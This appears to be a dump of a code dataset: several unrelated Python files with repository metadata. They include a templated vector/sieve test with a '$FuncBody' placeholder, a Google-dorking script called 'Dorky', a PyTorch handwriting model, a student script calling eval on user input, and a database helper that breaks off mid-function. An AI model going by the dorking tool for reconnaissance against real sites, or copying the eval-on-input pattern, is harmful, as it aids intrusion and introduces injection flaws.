def length2(self:"Vector4") -> int:
return self.size
# Retrieves the current size of the vector
def length3(self:"Vector4") -> int:
return self.size
# Retrieves the current size of the vector
def length4(self:"Vector4") -> int:
return self.size
# A resizable list of integers
class Vector5(object):
items: [int] = None
items2: [int] = None
items3: [int] = None
items4: [int] = None
items5: [int] = None
size: int = 0
size2: int = 0
size3: int = 0
size4: int = 0
size5: int = 0
def __init__(self:"Vector5"):
self.items = [0]
# Returns current capacity
def capacity(self:"Vector5") -> int:
return len(self.items)
# Returns current capacity
def capacity2(self:"Vector5") -> int:
return len(self.items)
# Returns current capacity
def capacity3(self:"Vector5") -> int:
return len(self.items)
# Returns current capacity
def capacity4(self:"Vector5") -> int:
return len(self.items)
# Returns current capacity
def capacity5(self:"Vector5") -> int:
return len(self.items)
# Increases capacity of vector by one element
def increase_capacity(self:"Vector5") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity2(self:"Vector5") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity3(self:"Vector5") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity4(self:"Vector5") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity5(self:"Vector5") -> int:
self.items = self.items + [0]
return self.capacity()
# Appends one item to end of vector
def append(self:"Vector5", item: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append2(self:"Vector5", item: int, item2: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append3(self:"Vector5", item: int, item2: int, item3: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append4(self:"Vector5", item: int, item2: int, item3: int, item4: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append5(self:"Vector5", item: int, item2: int, item3: int, item4: int, item5: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends many items to end of vector
def append_all(self:"Vector5", new_items: [int]) -> object:
item:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all2(self:"Vector5", new_items: [int], new_items2: [int]) -> object:
item:int = 0
item2:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all3(self:"Vector5", new_items: [int], new_items2: [int], new_items3: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all4(self:"Vector5", new_items: [int], new_items2: [int], new_items3: [int], new_items4: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
item4:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all5(self:"Vector5", new_items: [int], new_items2: [int], new_items3: [int], new_items4: [int], new_items5: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
item4:int = 0
item5:int = 0
for item in new_items:
self.append(item)
# Removes an item from the middle of vector
def remove_at(self:"Vector5", idx: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at2(self:"Vector5", idx: int, idx2: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at3(self:"Vector5", idx: int, idx2: int, idx3: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at4(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at5(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int, idx5: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Retrieves an item at a given index
def get(self:"Vector5", idx: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get2(self:"Vector5", idx: int, idx2: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get3(self:"Vector5", idx: int, idx2: int, idx3: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get4(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get5(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int, idx5: int) -> int:
return self.items[idx]
# Retrieves the current size of the vector
def length(self:"Vector5") -> int:
return self.size
# Retrieves the current size of the vector
def length2(self:"Vector5") -> int:
return self.size
# Retrieves the current size of the vector
def length3(self:"Vector5") -> int:
return self.size
# Retrieves the current size of the vector
def length4(self:"Vector5") -> int:
return self.size
# Retrieves the current size of the vector
def length5(self:"Vector5") -> int:
return self.size
# A faster (but more memory-consuming) implementation of vector
class DoublingVector(Vector):
doubling_limit:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# A faster (but more memory-consuming) implementation of vector
class DoublingVector2(Vector):
doubling_limit:int = 1000
doubling_limit2:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector2") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity2(self:"DoublingVector2") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# A faster (but more memory-consuming) implementation of vector
class DoublingVector3(Vector):
doubling_limit:int = 1000
doubling_limit2:int = 1000
doubling_limit3:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector3") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity2(self:"DoublingVector3") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity3(self:"DoublingVector3") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# A faster (but more memory-consuming) implementation of vector
class DoublingVector4(Vector):
doubling_limit:int = 1000
doubling_limit2:int = 1000
doubling_limit3:int = 1000
doubling_limit4:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector4") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity2(self:"DoublingVector4") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity3(self:"DoublingVector4") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity4(self:"DoublingVector4") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# A faster (but more memory-consuming) implementation of vector
class DoublingVector5(Vector):
doubling_limit:int = 1000
doubling_limit2:int = 1000
doubling_limit3:int = 1000
doubling_limit4:int = 1000
doubling_limit5:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity2(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity3(self:"DoublingVector5") -> int:
$FuncBody
# Overriding to do fewer resizes
def increase_capacity4(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity5(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Makes a vector in the range [i, j)
def vrange(i:int, j:int) -> Vector:
v:Vector = None
v = DoublingVector()
while i < j:
v.append(i)
i = i + 1
return v
def vrange2(i:int, j:int, i2:int, j2:int) -> Vector:
v:Vector = None
v2:Vector = None
v = DoublingVector()
while i < j:
v.append(i)
i = i + 1
return v
def vrange3(i:int, j:int, i2:int, j2:int, i3:int, j3:int) -> Vector:
v:Vector = None
v2:Vector = None
v3:Vector = None
v = DoublingVector()
while i < j:
v.append(i)
i = i + 1
return v
def vrange4(i:int, j:int, i2:int, j2:int, i3:int, j3:int, i4:int, j4:int) -> Vector:
v:Vector = None
v2:Vector = None
v3:Vector = None
v4:Vector = None
v = DoublingVector()
while i < j:
v.append(i)
i = i + 1
return v
def vrange5(i:int, j:int, i2:int, j2:int, i3:int, j3:int, i4:int, j4:int, i5:int, j5:int) -> Vector:
v:Vector = None
v2:Vector = None
v3:Vector = None
v4:Vector = None
v5:Vector = None
v = DoublingVector()
while i < j:
v.append(i)
i = i + 1
return v
# Sieve of Eratosthenes (not really)
def sieve(v:Vector) -> object:
i:int = 0
j:int = 0
k:int = 0
while i < v.length():
k = v.get(i)
j = i + 1
while j < v.length():
if v.get(j) % k == 0:
v.remove_at(j)
else:
j = j + 1
i = i + 1
def sieve2(v:Vector, v2:Vector) -> object:
i:int = 0
i2:int = 0
j:int = 0
j2:int = 0
k:int = 0
k2:int = 0
while i < v.length():
k = v.get(i)
j = i + 1
while j < v.length():
if v.get(j) % k == 0:
v.remove_at(j)
else:
j = j + 1
i = i + 1
def sieve3(v:Vector, v2:Vector, v3:Vector) -> object:
i:int = 0
i2:int = 0
i3:int = 0
j:int = 0
j2:int = 0
j3:int = 0
k:int = 0
k2:int = 0
k3:int = 0
while i < v.length():
k = v.get(i)
j = i + 1
while j < v.length():
if v.get(j) % k == 0:
v.remove_at(j)
else:
j = j + 1
i = i + 1
def sieve4(v:Vector, v2:Vector, v3:Vector, v4:Vector) -> object:
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
j:int = 0
j2:int = 0
j3:int = 0
j4:int = 0
k:int = 0
k2:int = 0
k3:int = 0
k4:int = 0
while i < v.length():
k = v.get(i)
j = i + 1
while j < v.length():
if v.get(j) % k == 0:
v.remove_at(j)
else:
j = j + 1
i = i + 1
def sieve5(v:Vector, v2:Vector, v3:Vector, v4:Vector, v5:Vector) -> object:
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
j:int = 0
j2:int = 0
j3:int = 0
j4:int = 0
j5:int = 0
k:int = 0
k2:int = 0
k3:int = 0
k4:int = 0
k5:int = 0
while i < v.length():
k = v.get(i)
j = i + 1
while j < v.length():
if v.get(j) % k == 0:
v.remove_at(j)
else:
j = j + 1
i = i + 1
# Input parameter
n:int = 50
n2:int = 50
n3:int = 50
n4:int = 50
n5:int = 50
# Data
v:Vector = None
v2:Vector = None
v3:Vector = None
v4:Vector = None
v5:Vector = None
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
# Crunch
v = vrange(2, n)
v2 = vrange(2, n)
v3 = vrange(2, n)
v4 = vrange(2, n)
v5 = vrange(2, n)
sieve(v)
# Print
while i < v.length():
print(v.get(i))
i = i + 1
|
[
"647530+Virtlink@users.noreply.github.com"
] |
647530+Virtlink@users.noreply.github.com
|
6e98f496de001b623f1d7d4423e52d8f9cfe8f9a
|
ed30efbe1d307f9a4428f5343d43334e9cfebc9f
|
/payment_system/wsgi/__init__.py
|
d92895c9f675d1a7f83ae96ecf833c1253fd84bf
|
[] |
no_license
|
Frumlen/payment_system
|
409a95a44284ad8c805bd00f68bff3830cf2d535
|
dd3504aa02ec4268f2c1419ea5e4febcb9427adb
|
refs/heads/master
| 2020-05-19T10:05:53.416289
| 2019-05-15T14:27:00
| 2019-05-15T14:27:00
| 184,964,347
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,259
|
py
|
"""WSGI config for payment_system project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
from django.core.wsgi import get_wsgi_application
from payment_system.wsgi.health_check import health_check
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'payment_system.settings')
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
application = health_check(application, '/health/')
|
[
"m.medzhidov@paymo.ru"
] |
m.medzhidov@paymo.ru
|
7c51fe984072915a490d61a51cb82390d3d7985c
|
4a7c8970f6f2fa9449bc4476f0ff105630ec79e2
|
/les03/practise exercise3_3.py
|
9bae97b2a4624cb6b55ed8790ad2ce0e76ef2b3d
|
[] |
no_license
|
hiddeagema/programming
|
b3e5f676301bb46073d7ca14d06ae8799cbff47f
|
f893518ccd8f15a69078902844cd67563ab42cd7
|
refs/heads/master
| 2021-05-16T12:21:41.649797
| 2017-11-10T16:10:14
| 2017-11-10T16:10:14
| 105,266,092
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 253
|
py
|
leeftijd = eval(input('Wat is je leeftijd: '))
paspoort = input('ben je in het bezit van een nederlans paspoort?: ')
if leeftijd >= 18 and paspoort == 'ja':
print('gefeliciteerd, je mag stemmen!')
else:
print('helaas, je mag nog niet stemmen!')
|
[
"hiddeagema@hotmail.com"
] |
hiddeagema@hotmail.com
|
ce31008417794c43ba2ba1e3cb618506de4eb633
|
69039ed1289d09420f425e21f4d370ccb531bb7b
|
/script.py
|
46cba30ab41cbbe07072da03a0fe971d35990f30
|
[] |
no_license
|
ev1lm0rty/Dorky
|
38274a0df19d8ad62887bd164cd01c46aeeec46a
|
5846d4485cda6e988ba0b5367118c3106bb60f0c
|
refs/heads/master
| 2023-03-31T06:43:41.099409
| 2021-04-08T14:18:31
| 2021-04-08T14:18:31
| 338,312,959
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,555
|
py
|
#!/usr/bin/python3
import argparse
import time
import sys
from apiclient.discovery import build
def banner():
print("-"*50)
print("DORKY by ev1l._.m0rty")
print("https://github.com/mrjoker05")
print("-"*50)
print()
def query(query , api , cse , f):
try:
s = build("customsearch" , "v1" , developerKey = api).cse()
#results = s.list(q = query , cx = cse, start=21).execute()
results = s.list(q = query , cx = cse).execute()
return results['items']
except:
print("\n[!] Daily Limit of API key reached. Try tomorrow\n")
f.close()
sys.exit()
def main():
banner()
parser = argparse.ArgumentParser()
parser.add_argument("-d" ,"--dork" , help="List of dorks" , required = True)
parser.add_argument("-a" , "--api" , help="Google API key", required = True)
parser.add_argument("-c" , "--csi" , help="Custom Search Id", required = True)
parser.add_argument("-o" , "--output" , help="Output file")
args = parser.parse_args()
api = args.api
csi = args.csi
dorks = args.dork
output = args.output
f = open(dorks)
try:
w = open(output , "w+")
except:
pass
lines = f.readlines()
results = []
for i in lines:
for j in query(i.strip() , api , csi ,f):
print(j['link'])
try:
w.write(j['link'])
w.write('\n')
except:
pass
try:
w.close()
except:
pass
f.close()
main()
|
[
"morty@localhost"
] |
morty@localhost
|
ce491302ad4795ecae1138b676b7361bc5a55e19
|
b54ca0d79c2a3ea601b4d13b055845835dbda696
|
/src/module6.py
|
d69113ba57778ff7b4e467941e3fb43b45867167
|
[] |
no_license
|
lucasp0927/python_numerical_project
|
7355ddcc64d123103b6d3fa14d5ca4d8d4053057
|
923f4229b8182f53b60df1436ea65bf1298cefdd
|
refs/heads/master
| 2020-05-17T18:12:19.035506
| 2011-06-26T17:44:50
| 2011-06-26T17:44:50
| 1,919,354
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 951
|
py
|
'''Module 6: exact solution
'''
import numpy as np
import scipy as sp
import scipy.integrate as inte
def exactSol(Amp, w, x0,v0,t0,x_int):
with open('param.in') as fin:
for line in fin:
data=line.split()
a0=float(data[0])
a1=float(data[1])
a2=float(data[2])
a3=float(data[3])
b=float(data[4])
xinit=[x0,v0]
print 'a0={0:6.4f} a1={1:6.4f} a2={2:6.4f} a3={3:6.4f}'.format(a0,a1,a2,a3)
dt=1e-5
t=np.arange(0,t0+dt,dt)
y=inte.odeint(f,xinit,t,args=(a0,a1,a2,a3,b,Amp,w))
with open('exact.dat','w') as fout:
for i in range(len(y)):
fout.write('%10.6f %10.6f\n' % (t[i],y[i,0]))
error=abs(float(y[-1,0])-x_int)/x_int
#print 'error: {0:8.2%}'.format( error)
return t,y[:,0],error
def f(x,t,a0,a1,a2,a3,b,Amp,w):
x0=x[0]
x1=x[1]
return [float(x1),(a0+a1*x0+a2*x0**2+a3*x0**3)-b*x1+Amp*np.cos(w*t)]
|
[
"lucasp0927@gmail.com"
] |
lucasp0927@gmail.com
|
0ac07e17df6cc7bc9ae4c5d0f646c6f125e05474
|
7fce2bdb66b00f2cf7f5df5082de27941fae4e26
|
/src/model.py
|
e621a311f44b6a498e10ff2d25313cfaf59ed391
|
[] |
no_license
|
hqdang/HTR-using-Pytorch
|
e3352de678cbc17b13d3bda349e9532f9cd23cea
|
4478efb6c55fd5612f8a241d20a00a9c04471abe
|
refs/heads/master
| 2020-05-20T17:18:45.361569
| 2019-05-21T00:18:16
| 2019-05-21T00:18:16
| 185,685,959
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,483
|
py
|
from __future__ import division
from __future__ import print_function
import sys
import numpy as np
import cv2
import torch
import torch.nn as nn
import torch.optim as optim
from torch.optim import lr_scheduler
import torchvision
from torchvision import datasets, models, transforms
from DL import DataLoader, Batch
import decode_beam
import tensorflow as tf
from SamplePreprocessor import preprocess
import os
import pathlib
import BestPath
import Common
import time
import copy
import math
class Model(torch.nn.Module):
# model constants
batchSize = 50
imgSize = (128, 32)
maxTextLen = 32
def __init__(self):
super(Model, self).__init__()
self.snapID = 0
#self.is_train = tf.placeholder(tf.bool, name='is_train')
# input image batch
#self.inputImgs = tf.placeholder(tf.float32, shape=(None, Model.imgSize[0], Model.imgSize[1]))
#self.inputImgs = torch.tensor(batch.imgs, Model.imgSize[0], Model.imgSize[1])
#cnn function
self.conv1 = torch.nn.Conv2d(1, 32, 5, stride = 1, padding = 2).cuda()
self.batchnorm1 = torch.nn.BatchNorm2d(32).cuda().cuda()
self.relu1 = torch.nn.ReLU().cuda()
self.pool1 = torch.nn.MaxPool2d((2,2), stride = (2,2)).cuda()
self.conv2 = torch.nn.Conv2d(32, 64, 5, stride = 1, padding = 2).cuda()
self.batchnorm2 = torch.nn.BatchNorm2d(64).cuda()
self.relu2 = torch.nn.ReLU().cuda()
self.pool2 = torch.nn.MaxPool2d((2,2), stride = (2,2)).cuda()
self.conv3 = torch.nn.Conv2d(64, 128, 3, stride = 1, padding = 1).cuda()
self.batchnorm3 = torch.nn.BatchNorm2d(128).cuda()
self.relu3 = torch.nn.ReLU().cuda()
self.pool3 = torch.nn.MaxPool2d((1,2), stride = (1,2)).cuda()
self.conv4 = torch.nn.Conv2d(128, 128, 3, stride = 1, padding = 1).cuda()
self.batchnorm4 = torch.nn.BatchNorm2d(128).cuda()
self.relu4 = torch.nn.ReLU().cuda()
self.pool4 = torch.nn.MaxPool2d((1,2), stride = (1,2)).cuda()
self.conv5 = torch.nn.Conv2d(128, 256, 3, stride = 1, padding = 1).cuda()
self.batchnorm5 = torch.nn.BatchNorm2d(256).cuda()
self.relu5 = torch.nn.ReLU().cuda()
self.pool5 = torch.nn.MaxPool2d((1,2), stride = (1,2)).cuda()
#rnn function
self.lstm = torch.nn.LSTM(256, 256, 2, batch_first = True, bidirectional = True).cuda()
# BxTxH + BxTxH -> BxTx2H -> BxTx1x2H
#squeeze
self.rnnconv2d = torch.nn.Conv2d(512, 80, 1, stride = 1, padding = 0).cuda()
def forward(self, inputImgs):
#cnn forward pass
inputTensor = torch.from_numpy(inputImgs).cuda()
inputTensor = inputTensor.type(torch.FloatTensor).cuda()
inputTensor = torch.unsqueeze(inputTensor, 1)
#print (inputTensor.size()) [50,1,128,32]
out = self.conv1(inputTensor)
out = self.batchnorm1(out)
out = self.relu1(out)
out = self.pool1(out)
out = self.conv2(out)
out = self.batchnorm2(out)
out = self.relu2(out)
out = self.pool2(out)
out = self.conv3(out)
out = self.batchnorm3(out)
out = self.relu3(out)
out = self.pool3(out)
out = self.conv4(out)
out = self.batchnorm4(out)
out = self.relu4(out)
out = self.pool4(out)
out = self.conv5(out)
out = self.batchnorm5(out)
out = self.relu5(out)
out = self.pool5(out)
#rnn forward pass
#print (cnn.size())
out = torch.squeeze(out, 3)
out = out.permute(0,2,1)
#print (cnn.size()) cnn= [50,32,256]
#h0, c0 shape (num_layers * num_directions, batch, hidden_size):
h0 = torch.zeros(4, out.size(0), 256).cuda()
c0 = torch.zeros(4, out.size(0), 256).cuda()
#packed_cnn = torch.nn.utils.rnn.pack_padded_sequence(cnn, [32]*cnn.size(1))
#print(packed_cnn.size())
out, _ = self.lstm(out, (h0,c0))
#print (rnn_out.size())
#rnn_out, _ = torch.nn.utils.rnn.pad_packed_sequence(rnn_out, batch_first=False)
#print (rnn_out.size()) [50,32,512]
out = torch.unsqueeze(out, 3) #[50,512,32,1]
out = out.permute(0,2,1,3) #[50,32,1,512]
#print (rnn_out.size())
#print (rnn_out.size())
out = self.rnnconv2d(out)
#out = self.fnl(rnn_out)
return out
|
[
"noreply@github.com"
] |
hqdang.noreply@github.com
|
54819c2945e27291a240ea27cec05786e14d8569
|
fd67c272b56eb6386e6e7e086c07616acdaa65b0
|
/Medic.py
|
ba276016a14278c0c369fcac7b095d59f79e98b3
|
[
"MIT"
] |
permissive
|
KToshiki-umi/Cuidemic
|
1894d7772012545ddcac2f91372e084d6fa72a4a
|
6f98d3d4c955fc298d1a4e31270a0e0ecc3d6752
|
refs/heads/master
| 2021-01-10T16:44:36.164847
| 2015-10-06T16:32:47
| 2015-10-06T16:32:47
| 43,758,174
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,149
|
py
|
#! /usr/bin/python
# --*-- coding:utf-8 --*--
"""
Medic.py
Copyright (c) 2015 Toshiki Koizumi
This software is released under the MIT License.
http://opensource.org/licenses/mit-license.php
"""
#v.1.01
from Player import Player
class Medic(Player):
def __init__(self):
Player.__init__(self)
self._role = "Medic" #役職名英名
#役職名
self._name = u" 衛生兵"
def treatDisease(self, game_data):
print u"■感染者の治療"
diseases = u""
disease_flag = []
disease_count = 0
color_index = ""
for temp_color_index in range(4):
if game_data._infection_status[self._location][temp_color_index] > 0:
diseases += u"%d : %s " % (temp_color_index, game_data._disease_name[temp_color_index])
disease_flag.append(temp_color_index)
color_index = temp_color_index
disease_count += 1
while(1):
if disease_count == 1:
# 感染が1種類のみの場合、自動的に治療
break
else:
print u"\n 治療したい病原体を選択してください"
print diseases
color_index = raw_input(" > ")
if color_index.isdigit():
color_index = int(color_index)
if disease_flag.count(color_index) > 0:
break
else:
print u" 入力した値は範囲外です"
elif color_index == "":
game_data._message = u"■ 処理はキャンセルされました"
return 0
else:
print u" 数値を入力してください"
game_data.cureDisease(self._location, 3, int(color_index))
game_data._message = u"■ %02d:%s で%sの治療を行いました" % (self._location, game_data._card_info[self._location], game_data._disease_name[int(color_index)])
return 1
|
[
"cb400f.4four@gmail.com"
] |
cb400f.4four@gmail.com
|
a485ba789e4cb165a9a47651c00c9cbcc5044881
|
786de89be635eb21295070a6a3452f3a7fe6712c
|
/DmMover/trunk/src/db_access.py
|
19e93a9e3957ed724ec3652b8cbbf6c793bb70c5
|
[] |
no_license
|
connectthefuture/psdmrepo
|
85267cfe8d54564f99e17035efe931077c8f7a37
|
f32870a987a7493e7bf0f0a5c1712a5a030ef199
|
refs/heads/master
| 2021-01-13T03:26:35.494026
| 2015-09-03T22:22:11
| 2015-09-03T22:22:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,292
|
py
|
#!/usr/bin/python
# ------------------------------------------------------------------
# Find below utilities needed by the ONLINE-to-Lustre data migration
# service.
# ------------------------------------------------------------------
import sys
import time
import MySQLdb as db
__host = None
__user = None
__passwd = None
__db = None
__db_conn = "/reg/g/psdm/psdatmgr/datamigr/.mvrdb-conn"
__dmtable = "data_migration"
# ------------------------------------------------------------------------
# Connect to MySQL server and execute the specified SELECT statement which
# is supposed to return a single row (if it return more then simply ignore
# anything before the first one). Return result as a dictionary. Otherwise return None.
#
# NOTE: this method won't catch MySQL exceptions. It's up to
# the caller to do so. See the example below:
#
# try:
# result = __do_select('SELECT...')
# except db.Error, e:
# print 'MySQL connection failed: '.str(e)
# ...
#
# ------------------------------------------------------------------------------
# database connection and table selection
def __connect_db():
""" Connect to database. Use default if no connection param were given"""
if not __db:
select_db(__db_conn)
return db.connect(host=__host, user=__user, passwd=__passwd, db=__db)
def select_db(conn_file):
""" Set database connection parameter"""
global __host, __user, __passwd, __db
line = open(conn_file).readline().rstrip()
key_value = dict([x.split('=', 1) for x in line.split(';') if x])
__host = key_value['Server']
__user = key_value['Uid']
__passwd = key_value.get('Pwd', "")
__db = key_value['Database']
def table_dm():
""" Select the data_migration table for ffb datamovers """
global __dmtable
__dmtable = "data_migration"
def table_dm_ana():
""" Select the data_migration table for ffb datamovers """
global __dmtable
__dmtable = "data_migration_ana"
def table_dm_ffb():
""" Select the data_migration table for ffb datamovers """
global __dmtable
__dmtable = "data_migration_ffb"
# ----------------
# query functions
# ----------------
def __escape_string(str):
conn = __connect_db()
return conn.escape_string(str)
def __do_select(statement):
conn = __connect_db()
cursor = conn.cursor(db.cursors.SSDictCursor)
cursor.execute("SET SESSION SQL_MODE='ANSI'")
cursor.execute(statement)
rows = cursor.fetchall()
if not rows : return None
return rows[0]
def __do_select_many(statement):
conn = __connect_db()
cursor = conn.cursor(db.cursors.SSDictCursor)
cursor.execute("SET SESSION SQL_MODE='ANSI'")
cursor.execute(statement)
return cursor.fetchall()
# ------------------------------------------------------------------------------------------
# Execute any SQL statement which doesn't return a result set
#
# Notes:
# - exceptions are thrown exactly as explained for the previously defined method __do_select
# - the statement will be surrounded by BEGIN and COMMIT transaction statements
# ------------------------------------------------------------------------------------------
def __do_sql(statement):
conn = __connect_db()
cursor = conn.cursor(db.cursors.SSDictCursor)
cursor.execute("SET SESSION SQL_MODE='ANSI'")
cursor.execute("BEGIN")
cursor.execute(statement)
cursor.execute("COMMIT")
# ------------------------------------------------------------
# Return the current time expressed in nanoseconds. The result
# will be packed into a 64-bit number.
# ------------------------------------------------------------
def __now_64():
t = time.time()
sec = int(t)
nsec = int(( t - sec ) * 1e9 )
return sec*1000000000L + nsec
# ---------------------------------------------------------------------
# Look for an experiment with specified identifier and obtain its name.
# Return None if no such experiment exists in the database.
# ------------------------------------------------------------------------------
def id2name(id):
row = __do_select("SELECT name FROM experiment WHERE id=%s" % id)
if not row : return None
return row['name']
# ---------------------------------------------------------------------
# Look for an experiment with specified identifier.
# Return None if no such experiment exists in the database.
# ------------------------------------------------------------------------------
def getexp(id):
row = __do_select("SELECT * FROM experiment WHERE id=%s" % id)
return row
# -----------------------------------------------------------------------------
# Look for an experiment with specified name and obtain its numeric identifier.
# Return None if no such experiment exists in the database.
# ------------------------------------------------------------------------------
def name2id(name):
row = __do_select("SELECT id FROM experiment WHERE name='%s'" % name)
if not row : return None
return int(row['id'])
def instr4id(id):
row = __do_select("SELECT i.name FROM instrument `i`, experiment `e` "
"WHERE e.id=%d AND e.instr_id=i.id" % id)
if row:
return row['name']
else:
return None
# --------------------------------------------------------------------
# Get data path for an experiment. Use a numeric identifier to specify
# the experiment.
# Return None if no data path is configured for the experiment.
# --------------------------------------------------------------------
def getexp_datapath(id):
row = __do_select("SELECT val FROM experiment_param WHERE exper_id=%s AND param='DATA_PATH'" % id)
if not row : return None
return row['val']
def getexp_datapath_all():
""" return name, id and exper-path for all experiments """
rows = __do_select_many("select e.name, e.id, p.val from experiment `e`, experiment_param `p`"
"where p.exper_id=e.id and p.param='DATA_PATH'")
return rows
# -------------------------------------
# Report the file migration start event
# -------------------------------------
def file_migration_start(exper_id, fn):
